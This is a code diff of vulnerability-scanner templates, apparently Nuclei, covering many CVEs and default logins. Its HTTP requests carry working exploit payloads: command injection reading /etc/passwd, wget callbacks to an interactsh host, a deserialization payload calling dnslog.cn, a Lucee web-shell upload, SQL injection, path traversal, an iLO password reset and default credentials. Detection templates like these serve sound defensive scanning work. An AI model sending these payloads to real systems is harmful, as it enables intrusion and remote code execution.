+  description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
-    Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
+  reference: https://support.citrix.com/article/CTX276688
-  reference:
-    - https://support.citrix.com/article/CTX276688
 
 requests:
   - raw:
       - |
         GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        DNT: 1
-        Connection: close
         Cookie: startupapp=st
-        Upgrade-Insecure-Requests: 1
 
     matchers-condition: and
     matchers:
@@ -29,10 +21,12 @@ requests:
         words:
           - "<jnlp codebase=\"nonexistent.1337\">"
         part: body
+
       - type: word
         words:
           - "application/x-java-jnlp-file"
         part: header
+
       - type: status
         status:
           - 200

cves/2020/CVE-2020-8515.yaml

@@ -15,9 +15,6 @@ requests:
       - |
         POST /cgi-bin/mainfunction.cgi HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: */*
-        Connection: close
 
         action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
 

cves/2020/CVE-2020-8813.yaml

@@ -14,10 +14,6 @@ requests:
       - |
         GET /graph_realtime.php?action=init HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: python-requests/2.18.4
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: keep-alive
         Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
 
     matchers:

cves/2020/CVE-2020-9315.yaml

@@ -12,8 +12,6 @@ requests:
     path:
       - "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2"
       - "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"
-    headers:
-      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
 
     matchers-condition: and
     matchers:

cves/2021/CVE-2021-1497.yaml

@@ -21,9 +21,7 @@ requests:
       - |
         POST /storfs-asup HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: */*
-        Content-Length: 78
         Content-Type: application/x-www-form-urlencoded
 
         action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`

cves/2021/CVE-2021-20092.yaml

@@ -24,11 +24,7 @@ requests:
         Host: {{Hostname}}
         Cookie: lang=8; url=ping.html; mobile=false;
         Referer: {{BaseURL}}/info.html
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en-US,en;q=0.9
-        Connection: close
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 178
 
     matchers-condition: and
     matchers:

cves/2021/CVE-2021-21307.yaml

@@ -16,24 +16,13 @@ requests:
       - |
         POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
-        Connection: close
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 8
 
         imgSrc=a
       - |
         POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 790
 
         imgSrc=
         <cfoutput>
@@ -62,13 +51,11 @@ requests:
         </pre>
         </cfif>
         </cfoutput>
+
       - |
         POST /lucee/{{randstr}}.cfm HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
         Content-Type: application/x-www-form-urlencoded
 
         cmd=id&opts=&timeout=5

cves/2021/CVE-2021-21389.yaml

@@ -18,7 +18,6 @@ requests:
       - |
         POST /wp-json/buddypress/v1/signup HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
         Content-Type: application/json; charset=UTF-8
 
         {

cves/2021/CVE-2021-21975.yaml

@@ -14,7 +14,6 @@ requests:
         POST /casa/nodes/thumbprints HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json;charset=UTF-8
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
 
         ["127.0.0.1:443/ui/"]
 

cves/2021/CVE-2021-21985.yaml

@@ -19,8 +19,6 @@ requests:
         Host: {{Hostname}}
         Accept: */*
         Content-Type: application/json
-        Content-Length: 86
-        Connection: close
 
         {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}
 

cves/2021/CVE-2021-22214.yaml

@@ -16,10 +16,8 @@ requests:
       - |
         POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
         Referer: {{BaseURL}}
         content-type: application/json
-        Connection: close
 
         {"content": "include:\n  remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
 

cves/2021/CVE-2021-24285.yaml

@@ -17,7 +17,6 @@ requests:
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        Content-Length: 47
 
         action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
 

cves/2021/CVE-2021-25281.yaml

@@ -13,13 +13,7 @@ requests:
       - |
         POST /run HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Accept-Language: en
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         Content-Type: application/json
-        Content-Length: 173
-        Connection: close
 
         {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
 

cves/2021/CVE-2021-25646.yaml

@@ -15,10 +15,7 @@ requests:
       - |
         POST /druid/indexer/v1/sampler HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         Content-Type: application/json
-        Content-Length: 1006
-        Connection: close
 
         {
         "type":"index",

cves/2021/CVE-2021-26295.yaml

@@ -19,42 +19,38 @@ requests:
       - |
         POST /webtools/control/SOAPService HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Accept-Language: en
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
-        Connection: close
         Content-Type: application/xml
-        Content-Length: 910
 
-        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+        <soapenv:Envelope
-        <soapenv:Header/>
+            xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
-        <soapenv:Body>
+            <soapenv:Header/>
-        <ser>
+            <soapenv:Body>
-        <map-HashMap>
+                <ser>
-        <map-Entry>
+                    <map-HashMap>
-        <map-Key>
+                        <map-Entry>
-        <cus-obj>bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
+                            <map-Key>
-        </map-Key>
+                                <cus-obj>bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
-        <map-Value>
+                            </map-Key>
-        <std-String value="http://t53lq9.dnslog.cn/"></std-String>
+                            <map-Value>
-        </map-Value>
+                                <std-String value="http://t53lq9.dnslog.cn/"></std-String>
-        </map-Entry>
+                            </map-Value>
-        </map-HashMap>
+                        </map-Entry>
-        </ser>
+                    </map-HashMap>
-        </soapenv:Body>
+                </ser>
+            </soapenv:Body>
         </soapenv:Envelope>
 
-
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - "OFBiz.Visitor="
         part: header
+
       - type: word
         words:
           - "deserializing"

cves/2021/CVE-2021-27850.yaml

@@ -16,18 +16,11 @@ requests:
         GET /assets/app/something/services/AppModule.class/ HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
-        Connection: close
+
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.9
       - |
         GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
-        Connection: close
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.9
 
     extractors:
       - type: regex

cves/2021/CVE-2021-28150.yaml

@@ -4,8 +4,7 @@ info:
   name: Hongdian Sensitive Information
   author: gy741
   severity: medium
-  description: |
+  description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
-    Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
   reference:
     - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-28150
@@ -16,26 +15,12 @@ requests:
       - |
         GET /backup2.cgi HTTP/1.1
         Host: {{Hostname}}
-        Cache-Control: max-age=0
         Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
-        Upgrade-Insecure-Requests: 1
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Accept-Encoding: gzip, deflate
-        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
-        Connection: close
 
       - |
         GET /backup2.cgi HTTP/1.1
         Host: {{Hostname}}
-        Cache-Control: max-age=0
         Authorization: Basic YWRtaW46YWRtaW4=
-        Upgrade-Insecure-Requests: 1
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Accept-Encoding: gzip, deflate
-        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
-        Connection: close
 
     matchers-condition: and
     matchers:

cves/2021/CVE-2021-28151.yaml

@@ -16,36 +16,18 @@ requests:
       - |
         POST /tools.cgi HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 85
-        Cache-Control: max-age=0
         Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
-        Upgrade-Insecure-Requests: 1
         Origin: {{BaseURL}}
-        Content-Type: application/x-www-form-urlencoded
+        Referer: {{BaseURL}}/tools.cgi
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Referer: http://{{Hostname}}/tools.cgi
-        Accept-Encoding: gzip, deflate
-        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
-        Connection: close
 
         op_type=ping&destination=%3Bid
 
       - |
         POST /tools.cgi HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 85
-        Cache-Control: max-age=0
         Authorization: Basic YWRtaW46YWRtaW4=
-        Upgrade-Insecure-Requests: 1
         Origin: {{BaseURL}}
-        Content-Type: application/x-www-form-urlencoded
+        Referer: {{BaseURL}}/tools.cgi
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Referer: http://{{Hostname}}/tools.cgi
-        Accept-Encoding: gzip, deflate
-        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
-        Connection: close
 
         op_type=ping&destination=%3Bid
 

cves/2021/CVE-2021-29203.yaml

@@ -14,21 +14,15 @@ requests:
       - |
         PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
         Host: {{Hostname}}
-        Accept-Language: en
         Accept: */*
-        Content-Length: 23
         Content-Type: application/json
-        Connection: close
 
         {"Password":"{{randstr}}"}
 
       - |
         POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
         Host: {{Hostname}}
-        Accept-Language: en
-        Content-Length: 50
         Content-Type: application/json
-        Connection: close
 
         {"UserName":"Administrator","Password":"{{randstr}}"}
 

cves/2021/CVE-2021-30461.yaml

@@ -14,11 +14,7 @@ requests:
         POST /index.php HTTP/1.1
         Host: {{Hostname}}
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
-        Connection: close
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 35
 
         SPOOLDIR=test".system(id)."&recheck=Recheck
 

cves/2021/CVE-2021-3129.yaml

@@ -15,10 +15,7 @@ requests:
       - |
         POST /_ignition/execute-solution HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: deflate
         Accept: application/json
-        Connection: close
-        Content-Length: 144
         Content-Type: application/json
 
         {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
@@ -26,10 +23,7 @@ requests:
       - |
         POST /_ignition/execute-solution HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: deflate
         Accept: application/json
-        Connection: close
-        Content-Length: 144
         Content-Type: application/json
 
         {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
@@ -37,10 +31,7 @@ requests:
       - |
         POST /_ignition/execute-solution HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: deflate
         Accept: application/json
-        Connection: close
-        Content-Length: 144
         Content-Type: application/json
 
         {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
@@ -48,10 +39,7 @@ requests:
       - |
         POST /_ignition/execute-solution HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: deflate
         Accept: application/json
-        Connection: close
-        Content-Length: 144
         Content-Type: application/json
 
         {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
@@ -59,10 +47,7 @@ requests:
       - |
         POST /_ignition/execute-solution HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: deflate
         Accept: application/json
-        Connection: close
-        Content-Length: 144
         Content-Type: application/json
 
         {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
@@ -70,10 +55,7 @@ requests:
       - |
         POST /_ignition/execute-solution HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: deflate
         Accept: application/json
-        Connection: close
-        Content-Length: 144
         Content-Type: application/json
 
         {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}

cves/2021/CVE-2021-31755.yaml

@@ -15,12 +15,8 @@ requests:
       - |
         POST /goform/setmac HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
+        Origin: {{BaseURL}}
-        Accept-Encoding: gzip, deflate
+        Referer: {{BaseURL}}/index.htmlr
-        Accept: */*
-        Origin: http://{{Hostname}}
-        Referer: http://{{Hostname}}/index.htmlr
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
         Content-Type: application/x-www-form-urlencoded
 
         module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static

cves/2021/CVE-2021-32030.yaml

@@ -14,7 +14,6 @@ requests:
         GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
         Host: {{Hostname}}
         User-Agent: asusrouter--
-        Connection: close
         Referer: {{BaseURL}}
         Cookie: asus_token=\0Invalid; clickedItem_tab=0
 

cves/2021/CVE-2021-3297.yaml

@@ -14,10 +14,6 @@ requests:
       - |
         GET /status.htm HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: keep-alive
         Cookie: language=en; login=1
 
     matchers-condition: and

cves/2021/CVE-2021-33544.yaml

@@ -15,9 +15,6 @@ requests:
         GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
         Host: {{Hostname}}
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Accept-Encoding: gzip, deflate
-        Cache-Control: max-age=0
-        Connection: keep-alive
 
     matchers:
       - type: word

cves/2021/CVE-2021-34429.yaml

@@ -16,13 +16,11 @@ requests:
         GET /%u002e/WEB-INF/web.xml HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
       - |+
         GET /.%00/WEB-INF/web.xml HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
 
     unsafe: true

cves/2021/CVE-2021-34621.yaml

@@ -12,13 +12,10 @@ requests:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
         Accept: application/json, text/javascript, */*; q=0.01
-        X-Requested-With: XMLHttpRequest
         Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}
-        Connection: close
 
         -----------------------------138742543134772812001999326589
         Content-Disposition: form-data; name="reg_username"
@@ -77,13 +74,10 @@ requests:
       - |
         POST /wp-login.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
         Accept: application/json, text/javascript, */*; q=0.01
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-Requested-With: XMLHttpRequest
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}
-        Connection: close
 
         log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In
 

cves/2021/CVE-2021-35336.yaml

@@ -10,16 +10,14 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
   tags: cve,cve2021,tieline,default-login
 
-# admin:password
-
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/api/get_device_details'
     headers:
-      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
       Referer: '{{BaseURL}}/assets/base/home.html'
       Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
+      # admin:password
 
     matchers-condition: and
     matchers:

default-logins/abb/cs141-default-login.yaml

@@ -14,36 +14,24 @@ requests:
       - |
         POST /api/login HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 44
         Accept: application/json, text/plain, */*
         Content-Type: application/json
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en,es-ES;q=0.9,es;q=0.8
-        Connection: close
 
         {"userName":"admin","password":"cs141-snmp"}
 
       - |
         POST /api/login HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 44
         Accept: application/json, text/plain, */*
         Content-Type: application/json
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en,es-ES;q=0.9,es;q=0.8
-        Connection: close
 
         {"userName":"engineer","password":"engineer"}
 
       - |
         POST /api/login HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 44
         Accept: application/json, text/plain, */*
         Content-Type: application/json
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en,es-ES;q=0.9,es;q=0.8
-        Connection: close
 
         {"userName":"guest","password":"guest"}
 

default-logins/aem/adobe-aem-default-credentials.yaml

@@ -11,15 +11,9 @@ requests:
       - |
         POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
-        Accept: text/plain, */*; q=0.01
-        Accept-Language: en-US,en;q=0.5
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-Requested-With: XMLHttpRequest
-        Content-Length: 67
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}/libs/granite/core/content/login.html
-        Connection: close
 
